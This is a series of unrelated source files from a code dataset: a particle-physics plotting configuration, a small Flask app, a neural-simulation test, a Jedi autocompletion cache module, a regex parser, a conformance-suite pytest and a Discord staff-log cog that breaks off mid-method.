mthbinning = [60,80,90,110,130,150,200]\nmllbinning = [10,25,40,50,70,90,210]\nname = ''\nmllbin = ['1'] # underflow is folded into the first bin, so this term is always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # no constant term: the first mth bin maps to 0\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_6x6'] = {\n 'name': name,\n 'range': (36, 0., 36.),\n 'xaxis': 'm^{ll}:m_{T}^{H}', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': sr\n}\n\nmthbinning = [60,80,90,110,130,150,200]\nmllbinning = [10,20,30,50,70,90,150]\nname = ''\nmllbin = ['1'] # underflow is folded into the first bin, so this term is always 1\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\nname += ' + %d*(' % (len(mllbinning) - 1)\nmthbin = [] # no constant term: the first mth bin maps to 0\nfor imth in range(1, len(mthbinning) - 1):\n mthbin.append('(mth >= %d)' % mthbinning[imth])\nname += '+'.join(mthbin)\nname += ') - 0.5'\n\nvariables['mllVSmth_6x6low'] = {\n 'name': name,\n 'range': (36, 0., 36.),\n 'xaxis': 'm^{ll}:m_{T}^{H}',\n 'doWeight': 1,\n 'cuts': sr\n}\n\nmllbinning = [12,30,50,70,90,110,150,200]\nname = ''\nmllbin = ['0.5'] # underflow folded; the 0.5 bakes in the half-bin offset\nfor imll in range(1, len(mllbinning) - 1):\n mllbin.append('(mll >= %d)' % mllbinning[imll])\nname += '+'.join(mllbin)\n \nvariables['mll_optim'] = {\n 'name': name,\n 'range': (len(mllbinning) - 1, 0., len(mllbinning) - 1.),\n 'xaxis': 'imll',\n 'cuts': sr\n}\n\nmllbinning = [10,25,35,40,45,50,55,70,90,210]\n\nvariables['mll'] = {\n 'name': 'mll',\n 'range': (mllbinning,),\n 'xaxis': 'm^{ll} [GeV]', # x axis name\n 'doWeight': 1, # do weighted plot too\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['jet1Eta'] = {\n 'name': 'std_vector_jet_eta[0] * (std_vector_jet_pt[0] > 30.) - 5. * (std_vector_jet_pt[0] < 30.)',\n 'range': (50, -4.7, 4.7),\n 'xaxis': '#eta^{j1}',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['jet2Eta'] = {\n 'name': 'std_vector_jet_eta[1] * (std_vector_jet_pt[1] > 30.) - 5. * (std_vector_jet_pt[1] < 30.)',\n 'range': (50, -4.7, 4.7),\n 'xaxis': '#eta^{j2}',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['met'] = {\n 'name': 'metPfType1',\n 'range': (50, 0., 100.),\n 'xaxis': 'E_{T}^{miss} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['metPhi'] = {\n 'name': 'metPfType1Phi',\n 'range': (50, -math.pi, math.pi),\n 'xaxis': '#phi(E_{T}^{miss})',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['ptWW'] = {\n 'name': 'pTWW',\n 'range': (50, 0., 400.),\n 'xaxis': 'p_{T}^{WW} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\nvariables['ht'] = {\n 'name': ('Sum$(std_vector_jet_pt * (std_vector_jet_pt > 30. 
&& TMath::Abs(std_vector_jet_eta) < 4.7))',),\n 'range': (50, 0., 1000.),\n 'xaxis': 'H_{T} [GeV]',\n 'doWeight': 1,\n 'cuts': cr,\n 'samples': nosignal\n}\n\n#variables['njet'] = {\n# 'name': 'njet', \n# 'range': (5,0,5), \n# 'xaxis': 'Number of jets',\n# 'fold': 2,\n#}\n#\n#variables['ptllmet'] = {\n# 'name': 'ptH',\n# 'range': (100,0,300),\n# 'xaxis': 'p_{T}^{llmet} [GeV]',\n# 'fold': 3\n#}\n#\n#variables['ptllmet_reco'] = {\n# 'name': 'ptH',\n# 'range': (ptHBinning,),\n# 'xaxis': 'p_{T}^{llmet} [GeV]'\n#}\n#\n#variables['ptllmet_gen'] = {\n# 'name': 'higgsGenpt',\n# 'range': (ptHBinning,),\n# 'xaxis': 'p_{T}^{llmet} [GeV]',\n# 'samples': mc\n#}\n#\n#variables['rmat_pth'] = {\n# 'name': 'higgsGenpt:pTWW',\n# 'range': ([0.,15.,30.,45.,60.,80.,120.,200.,350.,400.],[0.,15.,30.,45.,60.,80.,120.,200.,350.,400.]),\n# 'xaxis': 'Reco p_{T}^{H} [GeV]',\n# 'yaxis': 'Gen p_{T}^{H} [GeV]',\n# 'fold': 2,\n# 'samples': ['ggH_hww']\n#}\n#\n#variables['rmat_njet'] = {\n# 'name': 'nGenJetCapped:njet',\n# 'range': ([0.,1.,2.,3.],[0.,1.,2.,3.]),\n# 'xaxis': 'Reco number of jets',\n# 'yaxis': 'Gen number of jets',\n# 'fold': 2,\n# 'samples': ['ggH_hww']\n#}\n\n# # just for fun plots:\n \n#variables['drll'] = { 'name': 'drll', # variable name \n# 'range': (100,0,2), # variable range\n# 'xaxis': 'DR_{ll}', # x axis name\n# 'fold': 3\n# }\n#\n#\n#variables['nvtx'] = { 'name': 'nvtx', \n# 'range': (40,0,40), \n# 'xaxis': 'nvtx', \n# 'fold': 3\n# }\n#\n#variables['mll'] = { 'name': 'mll', # variable name \n# 'range': (20,10,200), # variable range\n# 'xaxis': 'm_{ll} [GeV]', # x axis name\n# 'fold': 0\n# }\n# \n#variables['mth'] = { 'name': 'mth', # variable name \n# 'range': (10,60,200), # variable range\n# 'xaxis': 'm_{T}^{H} [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['ptll'] = { 'name': 'ptll', # variable name \n# 'range': (20,0,200), # variable range\n# 'xaxis': 'pt_{ll} [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['met'] = { 'name': 'metPfType1', # variable name \n# 'range': (20,0,200), # variable range\n# 'xaxis': 'pfmet [GeV]', # x axis name\n# 'fold': 0\n# }\n#\n#variables['dphill'] = { 'name': 'abs(dphill)', \n# 'range': (20,0,3.14), \n# 'xaxis': ' #Delta #phi_{ll}',\n# 'fold': 3\n# }\n#\n#variables['pt1'] = { 'name': 'std_vector_lepton_pt[0]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 1st lep',\n# 'fold': 0 \n# }\n#\n#variables['pt2'] = { 'name': 'std_vector_lepton_pt[1]', \n# 'range': (40,0,100), \n# 'xaxis': 'p_{T} 2nd lep',\n# 'fold': 0 \n# }\n#\n#\n#\n#variables['eta1'] = { 'name': 'std_vector_lepton_eta[0]', \n# 'range': (20,-3,3), \n# 'xaxis': ' #eta 1st lep',\n# 'fold': 3 \n# }\n#\n#variables['eta2'] = { 'name': 'std_vector_lepton_eta[1]', \n# 'range': (20,-3,3), \n# 'xaxis': ' #eta 2nd lep',\n# 'fold': 3 \n# }\n#\n#variables['jetpt1'] = {\n# 'name': 'std_vector_jet_pt[0]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 1st jet',\n# 'fold': 2 # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n# }\n#\n#variables['jetpt2'] = {\n# 'name': 'std_vector_jet_pt[1]', \n# 'range': (40,0,200), \n# 'xaxis': 'p_{T} 2nd jet',\n# 'fold': 2 # 0 = not fold (default), 1 = fold underflowbin, 2 = fold overflow bin, 3 = fold underflow and overflow\n# }\n#\n#variables['jeteta1'] = { 'name': 'std_vector_jet_eta[0]',\n# 'range': (80,-5.0,5.0),\n# 'xaxis': ' #eta 1st jet',\n# 'fold': 0\n# }\n#\n#variables['jeteta2'] = { 'name': 'std_vector_jet_eta[1]',\n# 'range': (80,-5.0,5.0),\n# 'xaxis': ' #eta 2nd jet',\n# 'fold': 0\n# 
}\n","sub_path":"Configurations/Differential/ggH2016/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":9436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"469876210","text":"#!/usr/bin/env python2.7\n\nfrom flask import Flask, render_template, request, redirect, jsonify, url_for, flash\napp = Flask(__name__)\n\n# import CRUD Operations from Lesson 1\nfrom models import Base, User, Category, Wall, WallPhoto\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n# Create session and connect to # DB\nengine = create_engine('sqlite:///waldir.db')\nBase.metadata.bind = create_engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\ndef homepage():\n return render_template('homepage.html')\n\n\n\n# If you're executing me from the Python interpreter, do this:\n# If you're importing this file, don't do this:\nif __name__ == '__main__':\n # app.debug = True triggers a server reboot of sorts\n # if a change in the code is detected\n # as well as providing a debugger on the page\n app.debug = True\n app.run(host = '0.0.0.0', port = 8000)\n","sub_path":"vagrant/catalog/waldir.py","file_name":"waldir.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"618081081","text":"import matplotlib \n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport pyNN.nest as pynn\n\nN_NEURONS = 50\nw = 0.01\nsyn_delay = 1.\n\n# default_parameters = {\n # 'tau_refrac': 0.1,\n # 'cm': 1.0,\n # 'tau_syn_E': 5.0,\n # 'v_rest': -65.0,\n # 'tau_syn_I': 5.0,\n # 'tau_m': 20.0,\n # 'e_rev_E': 0.0,\n # 'i_offset': 0.0,\n # 'e_rev_I': -70.0,\n # 'v_thresh': -50.0,\n # 'v_reset': -65.0,\n# }\n\nneuron_parameters = {\n 'v_thresh': -35.0, \n 'tau_m': 20.,\n 'tau_syn_E': 10.0, \n 'e_rev_E': 0., \n 'tau_refrac': 0.1 , \n 'v_reset': -50.0, #hdbrgs\n 'tau_syn_I': 5., \n 'i_offset': 0.0,\n #ESS - BrainScaleS\n 'cm': 0.2,\n 'v_rest': -50.0,\n 'e_rev_I': -100.,\n} \n\npynn.setup(timestep=1.0)\n\nneurons = pynn.Population(N_NEURONS, \n pynn.IF_cond_exp(**neuron_parameters),\n )\nneurons.record('spikes')\n\ninputs = pynn.Population(N_NEURONS, \n pynn.SpikeSourcePoisson(rate=10.0),\n )\n\nsyn = pynn.StaticSynapse(weight=w, delay=syn_delay)\nproj = pynn.Projection(inputs, neurons,\n pynn.OneToOneConnector(), syn)\n\npynn.run(1000)\ndata = neurons.get_data().segments[0]\nout_spikes = np.array(data.spiketrains)\n\npynn.end()\n\nplt.figure()\nfor nid, times in enumerate(out_spikes):\n plt.plot(times, np.ones_like(times)*nid, '.b', markersize=1)\nplt.savefig(\"output.pdf\")\nplt.show()\n\n\n\n\n","sub_path":"codebase/tests/test_new_nest.py","file_name":"test_new_nest.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"294611346","text":"import glob\nimport hashlib\nimport json\nimport logging\nimport os\nimport re\nimport subprocess\nimport threading\nimport time\nfrom itertools import chain\nfrom string import whitespace\n\nfrom deoplete_jedi import utils\n\n_paths = []\n_cache_path = None\n# List of items in the file system cache. `import~` is a special key for\n# caching import modules. 
It should not be cached to disk.\n_file_cache = set(['import~'])\n\n# Cache version allows us to invalidate outdated cache data structures.\n_cache_version = 17\n_cache_lock = threading.RLock()\n_cache = {}\n\n# Python program to use, gets set from Source.on_init.\npython_path = None\n\nlog = logging.getLogger('deoplete.jedi.cache')\n\n# This uses [\\ \\t] to avoid spanning lines\n_import_re = re.compile(r'''\n ^[\\ \\t]*(\n from[\\ \\t]+[\\w\\.]+[\\ \\t]+import\\s+\\([\\s\\w,]+\\)|\n from[\\ \\t]+[\\w\\.]+[\\ \\t]+import[\\ \\t\\w,]+|\n import[\\ \\t]+\\([\\s\\w,]+\\)|\n import[\\ \\t]+[\\ \\t\\w,]+\n )\n''', re.VERBOSE | re.MULTILINE)\n\n\nclass CacheEntry(object):\n def __init__(self, dict):\n self.key = tuple(dict.get('cache_key'))\n self._touched = time.time()\n self.time = dict.get('time')\n self.modules = dict.get('modules')\n self.completions = dict.get('completions', [])\n self.refresh = False\n if self.completions is None:\n self.refresh = True\n self.completions = []\n\n def update_from(self, other):\n self.key = other.key\n self.time = other.time\n self.modules = other.modules\n self.completions = other.completions\n\n def touch(self):\n self._touched = time.time()\n\n def to_dict(self):\n return {\n 'version': _cache_version,\n 'cache_key': self.key,\n 'time': self.time,\n 'modules': self.modules,\n 'completions': self.completions,\n }\n\n\ndef get_cache_path():\n global _cache_path\n if not _cache_path or not os.path.isdir(_cache_path):\n p = subprocess.Popen([python_path, '-V'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = p.communicate()\n version = re.search(r'(\\d+\\.\\d+)\\.', (stdout or stderr).decode('utf8')).group(1)\n cache_dir = os.getenv('XDG_CACHE_HOME', '~/.cache')\n cache_dir = os.path.join(os.path.expanduser(cache_dir), 'deoplete/jedi',\n version)\n if not os.path.exists(cache_dir):\n umask = os.umask(0)\n os.makedirs(cache_dir, 0o0700)\n os.umask(umask)\n _cache_path = cache_dir\n return _cache_path\n\n\ndef retrieve(key):\n if not key:\n return None\n\n with _cache_lock:\n if key[-1] == 'package' and key[0] not in _file_cache:\n # This will only load the cached item from a file the first time it\n # was seen.\n cache_file = os.path.join(get_cache_path(), '{}.json'.format(key[0]))\n if os.path.isfile(cache_file):\n with open(cache_file, 'rt') as fp:\n try:\n data = json.load(fp)\n if data.get('version', 0) >= _cache_version:\n _file_cache.add(key[0])\n cached = CacheEntry(data)\n cached.time = time.time()\n _cache[key] = cached\n log.debug('Loaded from file: %r', key)\n return cached\n except Exception:\n pass\n cached = _cache.get(key)\n if cached:\n cached.touch()\n return cached\n\n\ndef store(key, value):\n with _cache_lock:\n if not isinstance(value, CacheEntry):\n value = CacheEntry(value)\n\n if value.refresh:\n # refresh is set when completions is None. This will be due to\n # Jedi producing an error and not getting any completions. 
Use any\n # previously cached completions while a refresh is attempted.\n old = _cache.get(key)\n if old is not None:\n value.completions = old.completions\n\n _cache[key] = value\n\n if key[-1] == 'package' and key[0] not in _file_cache:\n _file_cache.add(key[0])\n cache_file = os.path.join(get_cache_path(), '{}.json'.format(key[0]))\n with open(cache_file, 'wt') as fp:\n json.dump(value.to_dict(), fp)\n log.debug('Stored to file: %r', key)\n return value\n\n\ndef exists(key):\n with _cache_lock:\n return key in _cache\n\n\ndef reap_cache(max_age=300):\n \"\"\"Clear the cache of old items\n\n Module level completions are exempt from reaping. It is assumed that\n module level completions will have a key length of 1.\n \"\"\"\n while True:\n time.sleep(300)\n\n with _cache_lock:\n now = time.time()\n cur_len = len(_cache)\n for cached in list(_cache.values()):\n if cached.key[-1] not in ('package', 'local', 'boilerplate~',\n 'import~') \\\n and now - cached._touched > max_age:\n _cache.pop(cached.key)\n\n if cur_len - len(_cache) > 0:\n log.debug('Removed %d of %d cache items', len(_cache), cur_len)\n\n\ndef cache_processor_thread(compl_queue):\n errors = 0\n while True:\n try:\n compl = compl_queue.get()\n cache_key = compl.get('cache_key')\n cached = retrieve(cache_key)\n if cached is None or cached.time <= compl.get('time'):\n cached = store(cache_key, compl)\n log.debug('Processed: %r', cache_key)\n errors = 0\n except Exception as e:\n errors += 1\n if errors > 3:\n break\n log.error('Got exception while processing: %r', e)\n\n\ndef start_background(compl_queue):\n log.debug('Starting reaper thread')\n t = threading.Thread(target=cache_processor_thread, args=(compl_queue,))\n t.daemon = True\n t.start()\n t = threading.Thread(target=reap_cache)\n t.daemon = True\n t.start()\n\n\n# balanced() taken from:\n# http://stackoverflow.com/a/6753172/4932879\n# Modified to include string delimiters\ndef _balanced():\n # Doc strings might be an issue, but we don't care.\n idelim = iter(\"\"\"(){}[]\"\"''\"\"\")\n delims = dict(zip(idelim, idelim))\n odelims = {v: k for k, v in delims.items()}\n closing = delims.values()\n\n def balanced(astr):\n \"\"\"Test if a string has balanced delimiters.\n\n Returns a boolean and a string of the opened delimiter.\n \"\"\"\n stack = []\n skip = False\n open_d = ''\n open_str = ''\n for c in astr:\n if c == '\\\\':\n skip = True\n continue\n if skip:\n skip = False\n continue\n d = delims.get(c, None)\n if d and not open_str:\n if d in '\"\\'':\n open_str = d\n open_d = odelims.get(d)\n stack.append(d)\n elif c in closing:\n if c == open_str:\n open_str = ''\n if not open_str and (not stack or c != stack.pop()):\n return False, open_d\n if stack:\n open_d = odelims.get(stack[-1])\n else:\n open_d = ''\n return not stack, open_d\n return balanced\nbalanced = _balanced() # noqa: E305\n\n\ndef split_module(text, default_value=None):\n \"\"\"Utility to split the module text.\n\n If there is nothing to split, return `default_value`.\n \"\"\"\n b, d = balanced(text)\n if not b:\n # Handles cases where the cursor is inside of unclosed delimiters.\n # If the input is: re.search(x.spl\n # The returned value should be: x\n if d and d not in '\\'\"':\n di = text.rfind(d)\n if di != -1:\n text = text[di + 1:]\n else:\n return default_value\n m = re.search(r'([\\S\\.]+)$', text)\n if m and '.' 
in m.group(1):\n return m.group(1).rsplit('.', 1)[0]\n return default_value\n\n\ndef get_parents(source, line, class_only=False):\n \"\"\"Find the parent blocks\n\n Collects parent blocks that contain the current line to help form a cache\n key based on variable scope.\n \"\"\"\n parents = []\n start = line - 1\n indent = len(source[start]) - len(source[start].lstrip())\n if class_only:\n pattern = r'^\\s*class\\s+(\\w+)'\n else:\n pattern = r'^\\s*(?:def|class)\\s+(\\w+)'\n\n for i in range(start, 0, -1):\n s_line = source[i].lstrip()\n l_indent = len(source[i]) - len(s_line)\n if s_line and l_indent < indent:\n m = re.search(pattern, s_line)\n indent = l_indent\n if m:\n parents.insert(0, m.group(1))\n\n return parents\n\n\ndef full_module(source, obj):\n \"\"\"Construct the full module path\n\n This finds all imports and attempts to reconstruct the full module path.\n If matched on a standard `import` line, `obj` itself is a full module path.\n On `from` import lines, the parent module is prepended to `obj`.\n \"\"\"\n\n module = ''\n obj_pat = r'(?:(\\S+)\\s+as\\s+)?\\b{0}\\b'.format(re.escape(obj.split('.', 1)[0]))\n for match in _import_re.finditer('\\n'.join(source)):\n module = ''\n imp_line = ' '.join(match.group(0).split())\n if imp_line.startswith('from '):\n _, module, imp_line = imp_line.split(' ', 2)\n m = re.search(obj_pat, imp_line)\n if m:\n # If the import is aliased, use the alias as part of the key\n alias = m.group(1)\n if alias:\n obj = obj.split('.')\n obj[0] = alias\n obj = '.'.join(obj)\n if module:\n return '.'.join((module, obj))\n return obj\n return None\n\n\ndef sys_path(refresh=False):\n global _paths\n if not _paths or refresh:\n p = subprocess.Popen([\n python_path,\n '-c', r'import sys; print(\"\\n\".join(sys.path))',\n ], stdout=subprocess.PIPE)\n stdout, _ = p.communicate()\n _paths = [x for x in stdout.decode('utf8').split('\\n')\n if x and os.path.isdir(x)]\n return _paths\n\n\ndef is_package(module, refresh=False):\n \"\"\"Test if a module path is an installed package\n\n The current interpreter's sys.path is retrieved on first run.\n \"\"\"\n if re.search(r'[^\\w\\.]', module):\n return False\n\n paths = sys_path(refresh)\n\n module = module.split('.', 1)[0]\n pglobs = [os.path.join(x, module, '__init__.py') for x in paths]\n pglobs.extend([os.path.join(x, '{}.*'.format(module)) for x in paths])\n return any(map(glob.glob, pglobs))\n\n\ndef cache_context(filename, context, source, extra_path): # noqa: C901\n \"\"\"Caching based on context input.\n\n If the input is blank, it was triggered with `.` to get module completions.\n\n The module files as reported by Jedi are stored with their modification\n times to help detect if a cache needs to be refreshed.\n\n For scoped variables in the buffer, construct a cache key using the\n filename. The buffer file's modification time is checked to see if the\n completion needs to be refreshed. 
The approximate scope lines are cached\n to help invalidate the cache based on line position.\n\n Cache keys are made using tuples to make them easier to interpret later.\n \"\"\"\n cinput = context['input'].lstrip().lstrip('@')\n if not re.sub(r'[\\s\\d\\.]+', '', cinput):\n return None, []\n filename_hash = hashlib.md5(filename.encode('utf8')).hexdigest()\n line = context['position'][1]\n log.debug('Input: \"%s\"', cinput)\n cache_key = None\n extra_modules = []\n cur_module = os.path.splitext(os.path.basename(filename))[0]\n\n if cinput.startswith(('import ', 'from ')):\n # Cache imports with buffer filename as the key prefix.\n # For `from` imports, the first part of the statement is\n # considered to be the same as `import` for caching.\n\n import_key = 'import~'\n cinput = context['input'].lstrip()\n m = re.search(r'^from\\s+(\\S+)(.*)', cinput)\n if m:\n if m.group(2).lstrip() in 'import':\n cache_key = ('importkeyword~', )\n return cache_key, extra_modules\n import_key = m.group(1) or 'import~'\n elif cinput.startswith('import ') and cinput.rstrip().endswith('.'):\n import_key = re.sub(r'[^\\s\\w\\.]', ' ', cinput.strip()).split()[-1]\n\n if import_key:\n if '.' in import_key and import_key[-1] not in whitespace \\\n and not re.search(r'^from\\s+\\S+\\s+import', cinput):\n # Dot completion on the import line\n import_key, _ = import_key.rsplit('.', 1)\n import_key = import_key.rstrip('.')\n module_file = utils.module_search(\n import_key,\n chain(extra_path,\n [context.get('cwd'), os.path.dirname(filename)],\n utils.rplugin_runtime_paths(context)))\n if module_file:\n cache_key = (import_key, 'local')\n extra_modules.append(module_file)\n elif is_package(import_key):\n cache_key = (import_key, 'package')\n elif not cinput.endswith('.'):\n cache_key = ('import~',)\n else:\n return None, extra_modules\n\n if not cache_key:\n obj = split_module(cinput.strip())\n if obj:\n cache_key = (obj, 'package')\n if obj.startswith('self'):\n if os.path.exists(filename):\n extra_modules.append(filename)\n # `self` is a special case object that needs a scope included\n # in the cache key.\n parents = get_parents(source, line, class_only=True)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), obj)\n else:\n module_path = full_module(source, obj)\n if module_path and not module_path.startswith('.') \\\n and is_package(module_path):\n cache_key = (module_path, 'package')\n else:\n # A quick scan revealed that the dot completion doesn't\n # involve an imported module. 
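(A hypothetical case: completing conn.cur where conn is a local variable rather than an import.)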
Treat it like a scoped\n # variable and ensure the cache invalidates when the file\n # is saved.\n if os.path.exists(filename):\n extra_modules.append(filename)\n\n module_file = utils.module_search(module_path,\n [os.path.dirname(filename)])\n if module_file:\n cache_key = (module_path, 'local')\n else:\n parents = get_parents(source, line)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), obj, 'dot')\n elif context.get('complete_str') or cinput.rstrip().endswith('='):\n parents = get_parents(source, line)\n parents.insert(0, cur_module)\n cache_key = (filename_hash, tuple(parents), 'vars')\n if os.path.exists(filename):\n extra_modules.append(filename)\n\n return cache_key, extra_modules\n","sub_path":"rplugin/python3/deoplete/sources/deoplete_jedi/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":15614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"40868571","text":"from nephlib.util import Util\nimport re\n\n\nclass EasyRegex(object):\n\n GRP_NAME_PATTERN = '\\?\\<([^\\>]+)\\>'\n\n def __init__(self):\n pass\n\n @staticmethod\n def parse(pattern, text):\n group_names = EasyRegex._get_regex_group_names(pattern)\n\n rows = []\n for m in re.finditer(EasyRegex._fix_pattern(pattern), text):\n cols = []\n for i, grp_name in enumerate(group_names):\n cols.append(str(m.group(grp_name) or 'null'))\n rows.append(cols)\n\n return rows\n\n @staticmethod\n def _fix_pattern(pattern):\n return pattern.replace('?<', '?P<')\n\n @staticmethod\n def _get_regex_group_names(pattern):\n group_names = []\n for m in re.finditer(EasyRegex.GRP_NAME_PATTERN, pattern):\n group_names.append(m.group(1))\n\n return group_names\n\n\nclass Main(object):\n\n def __init__(self):\n self._pattern = r\"Url:\\s(?[^\\|]*)\\s\\|\\sParam:\\s(?[^{|\\n]+)(?{(messageType='(?[^']+)',\\s)*(message='(?[^']+)',\\s)*(sticky=(?[^,]+),\\s)*(notificationType='(?[^']+)')*[^}]*})*\"\n self._pattern2 = r\"feedCategory='(?[^']+)',\\sfeedType='(?[^']+)'\"\n self._file = 'easy_regex.txt'\n\n def start(self):\n text = Util.load_file('input/{}'.format(self._file))\n for row in EasyRegex.parse(self._pattern, text):\n print('\\t'.join([\n r\n .replace('null', '')\n .replace(' [', '\\t{')\n .replace(']', '}')\n .replace('New', '')\n .replace('http://localhost:12021/nls//event/1002755836/', '')\n for r in row\n ]))\n\n\nif __name__ == '__main__':\n Main().start()\n","sub_path":"Scripts/automation/text_parser/EasyRegex.py","file_name":"EasyRegex.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347618848","text":"import os\nimport pytest\nfrom tests.integration_tests.validation.validation_util import get_test_data\n\n\nCONFORMANCE_SUITE = 'tests/resources/conformance_suites/trr-3.0.1.zip'\nARGS = [\n '--file', os.path.abspath(os.path.join(CONFORMANCE_SUITE, 'testcase.xml')),\n '--formula', 'run',\n '--keepOpen',\n '--testcaseResultsCaptureWarnings',\n '--validate'\n]\n\nif os.getenv('CONFORMANCE_SUITES_TEST_MODE') == 'OFFLINE':\n ARGS.extend(['--internetConnectivity', 'offline'])\n\nTEST_DATA = get_test_data(ARGS)\n\n\n@pytest.mark.parametrize(\"result\", TEST_DATA)\ndef test_xbrl_transformation_registry_3_conformance_suite(result):\n \"\"\"\n Test the XBRL Transformation Registry 3 Conformance Suite\n \"\"\"\n assert result.get('status') == 'pass', \\\n 'Expected these validation suffixes: {}, but received these validations: {}'.format(\n 
result.get('expected'), result.get('actual')\n )\n","sub_path":"tests/integration_tests/validation/XBRL/test_xbrl_transformation_registry_3_conformance_suite.py","file_name":"test_xbrl_transformation_registry_3_conformance_suite.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"426034694","text":"import logging\nfrom datetime import datetime, timedelta\nfrom typing import Optional, Tuple, Union\n\nimport discord\nimport humanize\nfrom discord.ext import commands\nfrom peewee import DoesNotExist\n\nfrom bolt.cogs.infractions.models import Infraction\nfrom bolt.cogs.infractions.types import InfractionType\nfrom bolt.database import objects\nfrom .models import StaffLogChannel\nfrom .util import get_log_channel as fetch_log_channel\n\n\nlog = logging.getLogger(__name__)\n\n\ndef thirty_seconds_ago() -> datetime:\n \"\"\"\n Gives the time 30 seconds ago.\n\n Returns:\n datetime:\n A datetime object representing the\n date and time as they were 30 seconds ago.\n \"\"\"\n\n return datetime.utcnow() - timedelta(seconds=30)\n\n\nclass StaffLog:\n \"\"\"\n Commands that help configuring a staff log.\n Kind of like the audit log, but lasts as long\n as the bot's messages stay there and logs more events.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n log.debug('Loaded Cog StaffLog.')\n\n def __unload(self):\n log.debug('Unloaded Cog StaffLog.')\n\n async def get_log_channel(self, guild: discord.Guild) -> Optional[\n Tuple[\n StaffLogChannel,\n discord.TextChannel\n ]]:\n \"\"\"\n Get the staff log channel for the given Guild ID.\n\n Args:\n guild_id (discord.Guild):\n The guild whose log channel should be returned.\n\n Returns:\n Optional[Tuple[StaffLogChannel, discord.TextChannel]]:\n The channel row and discord Channel if found,\n otherwise, if nothing was found, `None`.\n \"\"\"\n\n channel_obj = await fetch_log_channel(self.bot, guild)\n if channel_obj is not None:\n channel = guild.get_channel(channel_obj.channel_id)\n if channel is None:\n log.debug(\n \"Previously set stafflog channel for guild {guild} ({guild.id}) \"\n \"could not be found anymore, deleting from the database.\"\n )\n await objects.delete(channel_obj)\n return channel_obj, channel\n\n async def log_for(self, guild: discord.Guild, embed: discord.Embed):\n \"\"\"\n Log the given embed in the given guild's staff log channel, if set.\n\n Args:\n guild (discord.Guild):\n The guild to log the event on.\n embed (discord.Embed):\n The embed to send in the staff log channel.\n \"\"\"\n\n result_tuple = await self.get_log_channel(guild)\n if result_tuple is not None:\n channel_row, channel = result_tuple\n if channel_row.enabled and channel is not None:\n await channel.send(embed=embed)\n\n async def on_message_delete(self, message: discord.Message):\n if message.guild is None or message.author == self.bot.user:\n return\n\n info_embed = discord.Embed(\n title=f\"🗑 Message deleted (`{message.id}`)\",\n colour=discord.Colour.red(),\n timestamp=datetime.utcnow()\n ).set_author(\n name=f\"{message.author} ({message.author.id})\",\n icon_url=message.author.avatar_url\n ).add_field(\n name=\"Channel\",\n value=message.channel.mention\n ).add_field(\n name=\"Creation date\",\n value=message.created_at.strftime('%d.%m.%y %H:%M')\n ).add_field(\n name=\"System content\",\n value=message.system_content or \"(no content)\"\n )\n\n if message.attachments:\n info_embed.add_field(\n name=f\"{len(message.attachments)} Attachments\",\n value=', 
'.join(\n f\"[{attachment.filename}]({attachment.url})\"\n for attachment in message.attachments\n )\n )\n\n await self.log_for(message.guild, info_embed)\n\n async def on_message_edit(self, before: discord.Message, after: discord.Message):\n if after.guild is None or after.author == self.bot.user:\n return\n elif before.content == after.content:\n # It's some other edit that we don't actually care about.\n return\n\n info_embed = discord.Embed(\n title=f\"📝 Message edited (`{after.id}`)\",\n colour=discord.Colour.blue(),\n timestamp=datetime.utcnow()\n ).set_author(\n name=f\"{after.author} ({after.author.id})\",\n icon_url=after.author.avatar_url\n ).add_field(\n name=\"Channel\",\n value=after.channel.mention\n ).add_field(\n name=\"Creation date\",\n value=after.created_at.strftime('%d.%m.%y %H:%M')\n ).add_field(\n name=\"Old content\",\n value=before.content or \"(no content)\"\n ).add_field(\n name=\"Updated content\",\n value=after.content or \"(no content)\"\n )\n\n await self.log_for(after.guild, info_embed)\n\n async def on_member_join(self, member: discord.Member):\n info_embed = discord.Embed(\n 